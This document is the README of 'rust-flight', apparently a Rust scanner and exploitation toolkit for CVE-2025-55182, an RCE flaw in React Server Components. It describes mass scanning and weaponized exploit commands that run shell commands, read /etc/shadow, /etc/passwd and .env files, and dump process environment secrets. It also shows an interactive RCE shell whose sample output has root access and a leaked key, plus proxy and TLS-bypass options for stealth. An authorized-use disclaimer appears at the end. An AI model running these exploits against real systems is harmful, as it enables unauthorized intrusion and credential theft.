High-performance security scanner and exploitation toolkit for CVE-2025-55182 (React Server Components RCE).
Built for security researchers, bug bounty hunters, and CI/CD pipelines. rust-flight combines fast async scanning with weaponized exploitation modules for the React Server Components prototype pollution vulnerability.
- 🚀 Mass Scanning — Async engine with configurable concurrency and rate limiting
- 🎯 Precision Detection — Regex-based rules to minimize false positives
- 💥 Weaponized Exploits — RCE, file read, and arbitrary JavaScript execution
- 🐚 Interactive Shell — Built-in exploitation REPL for manual testing
- 🛡️ Stealth — Proxy support, custom headers/cookies, and TLS bypass
- 📊 Multiple Output Formats — JSON, CSV, SARIF (for GitHub/GitLab), Markdown
- ⚡ Rate Limiting — Production-grade throttling with exponential backoff retries
- 📈 Progress Tracking — Real-time progress bar with ETA and statistics
cargo build --releaseBinary will be available at ./target/release/rust-flight.
# Build image
docker build -t rust-flight .
# Run
docker run --rm rust-flight --help
docker run --rm rust-flight scan -u http://target.com# Scan a single target
rust-flight scan -u http://target:3000
# Scan multiple targets from file
rust-flight scan -l targets.txt -c 20
# Scan from stdin (pipeline)
cat urls.txt | rust-flight scan
# Exploit a vulnerable target
rust-flight exploit -u http://target:3000 --cmd "id"
# Interactive shell
rust-flight shell -u http://target:3000Scan one or more targets for CVE-2025-55182 vulnerabilities.
rust-flight scan [OPTIONS]| Option | Description |
|---|---|
-u, --url <URL> |
Single target URL |
-l, --list <FILE> |
File containing target URLs (one per line) |
-e, --endpoint <PATH> |
Server action endpoint (default: /formaction) |
| stdin | Automatically reads from stdin if piped |
| Option | Description |
|---|---|
-o, --output <FILE> |
Write results to file |
--output-format <FMT> |
Format: json, csv, sarif, markdown (default: json) |
--silent |
Print only results (no banner/progress) |
-q, --quiet |
Suppress non-essential output |
| Option | Description |
|---|---|
-H, --header <N:V> |
Custom header (repeatable) |
-b, --cookie <COOKIE> |
Cookie to include |
-x, --proxy <URL> |
Proxy URL (e.g., http://127.0.0.1:8080) |
--user-agent <UA> |
Custom User-Agent |
--timeout <SECS> |
Request timeout (default: 10) |
--insecure |
Accept invalid TLS certificates |
| Option | Description |
|---|---|
-r, --rate <N> |
Max requests per second (default: 50, 0 = unlimited) |
-c, --concurrency <N> |
Concurrent workers (default: 10) |
--retries <N> |
Retry failed requests (default: 2) |
--delay <MS> |
Delay between requests in ms (default: 0) |
--stop-on-first |
Stop after finding first vulnerability |
# Basic scan
rust-flight scan -u http://target:3000
# Mass scan with rate limiting
rust-flight scan -l targets.txt -r 100 -c 20
# Output SARIF for GitHub Security
rust-flight scan -l targets.txt -o results.sarif --output-format sarif
# Scan through proxy with custom headers
rust-flight scan -u http://target:3000 \
-x http://127.0.0.1:8080 \
-H "Authorization: Bearer token" \
-b "session=abc123"
# Pipeline mode
subfinder -d target.com | httpx | rust-flight scan --output-format jsonExploit a confirmed vulnerable target with RCE, file read, or custom JavaScript.
rust-flight exploit -u <URL> [--cmd | --read | --js] [OPTIONS]| Option | Description |
|---|---|
--cmd <COMMAND> |
Execute shell command |
--read <FILE> |
Read file from target filesystem |
--js <CODE> |
Execute arbitrary JavaScript |
| Option | Description |
|---|---|
-u, --url <URL> |
Target URL (required) |
-e, --endpoint <PATH> |
Server action endpoint (default: /formaction) |
--method <METHOD> |
Exploitation method: vm, child-process, fs (default: vm) |
-H, --header <N:V> |
Custom header (repeatable) |
-b, --cookie <COOKIE> |
Cookie to include |
-x, --proxy <URL> |
Proxy URL |
--timeout <SECS> |
Request timeout (default: 10) |
--insecure |
Accept invalid TLS certificates |
# Execute command
rust-flight exploit -u http://target:3000 --cmd "whoami"
rust-flight exploit -u http://target:3000 --cmd "cat /etc/shadow"
# Read files
rust-flight exploit -u http://target:3000 --read /etc/passwd
rust-flight exploit -u http://target:3000 --read /app/.env
# Execute JavaScript
rust-flight exploit -u http://target:3000 --js "process.env"
rust-flight exploit -u http://target:3000 --js "require('os').networkInterfaces()"
# Use different exploitation method
rust-flight exploit -u http://target:3000 --cmd "id" --method child-process
# Quiet mode (only output result)
rust-flight exploit -u http://target:3000 --cmd "id" -qStart an interactive REPL for manual exploitation.
rust-flight shell -u <URL> [OPTIONS]$ rust-flight shell -u http://target:3000
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ rust-flight - Interactive Shell ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Target: http://target:3000/formaction
[*] Method: Vm
Type commands to execute. Prefix with 'js ' for JavaScript.
Type 'exit' to quit.
rce> id
uid=0(root) gid=0(root) groups=0(root)
rce> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
rce> js process.env.SECRET_KEY
s3cr3t_k3y_12345
rce> exit
Newline-delimited JSON (NDJSON) for easy parsing:
rust-flight scan -u http://target:3000 --output-format json{"target":"http://target:3000/formaction","gadget":"VM RCE","vulnerable":true,"timestamp":"2024-12-04T10:30:00Z"}
{"target":"http://target:3000/formaction","gadget":"ExecSync","vulnerable":false,"timestamp":"2024-12-04T10:30:01Z"}rust-flight scan -l targets.txt -o results.csv --output-format csvtarget,gadget,vulnerable,error,timestamp
http://target:3000/formaction,VM RCE,true,,2024-12-04T10:30:00Z
http://target:3000/formaction,ExecSync,false,,2024-12-04T10:30:01Z
SARIF 2.1.0 format for GitHub Advanced Security, GitLab SAST, and other CI/CD integrations:
rust-flight scan -l targets.txt -o results.sarif --output-format sarifUpload to GitHub:
gh api -X POST /repos/{owner}/{repo}/code-scanning/sarifs \
-f "sarif=$(gzip -c results.sarif | base64)"Human-readable report:
rust-flight scan -l targets.txt -o report.md --output-format markdownrust-flight is designed for automation with meaningful exit codes and machine-readable output formats.
| Code | Status | Description |
|---|---|---|
0 |
Clean | Scan completed, no vulnerabilities found |
1 |
Error | Execution error (invalid arguments, network failure, etc.) |
2 |
Vulnerable | One or more vulnerabilities detected |
3 |
Partial | Scan completed with some failed targets |
#!/bin/bash
set -euo pipefail
rust-flight scan -l targets.txt -o results.sarif --output-format sarif
exit_code=$?
case $exit_code in
0) echo "[+] Scan clean - no vulnerabilities found" ;;
1) echo "[-] Scan error" && exit 1 ;;
2) echo "[!] Vulnerabilities detected" && exit 1 ;;
3) echo "[~] Partial results - some targets unreachable" ;;
esacname: Security Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Run rust-flight scan
run: rust-flight scan -l targets.txt -o results.sarif --output-format sarif
continue-on-error: true
- name: Upload SARIF to GitHub Security
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: results.sarifsecurity_scan:
stage: test
script:
- rust-flight scan -l targets.txt -o gl-sast-report.json --output-format sarif
artifacts:
reports:
sast: gl-sast-report.json
allow_failure: trueThese options apply to all commands:
| Option | Description |
|---|---|
-v, --verbose |
Enable debug output |
-q, --quiet |
Suppress banner and non-essential output |
--no-color |
Disable colored output |
--debug-log <FILE> |
Write debug logs to file (JSON format) |
-h, --help |
Print help |
-V, --version |
Print version |
| Gadget | Module | Detection Method |
|---|---|---|
| VM RCE | vm#runInThisContext |
Math expression evaluation |
| VM Sandbox Escape | vm#runInNewContext |
Math expression evaluation |
| Command Execution | child_process#execSync |
Echo marker detection |
| Command Execution | child_process#execFileSync |
Echo marker detection |
| File Read | fs#readFileSync |
/etc/passwd pattern match |
| Prototype Access | fs#constructor |
JSON response heuristic |
MIT
This tool is intended for authorized security testing and research only.
Unauthorized access to computer systems is illegal. You are solely responsible for ensuring you have proper authorization before using this tool against any target. The authors assume no liability for misuse.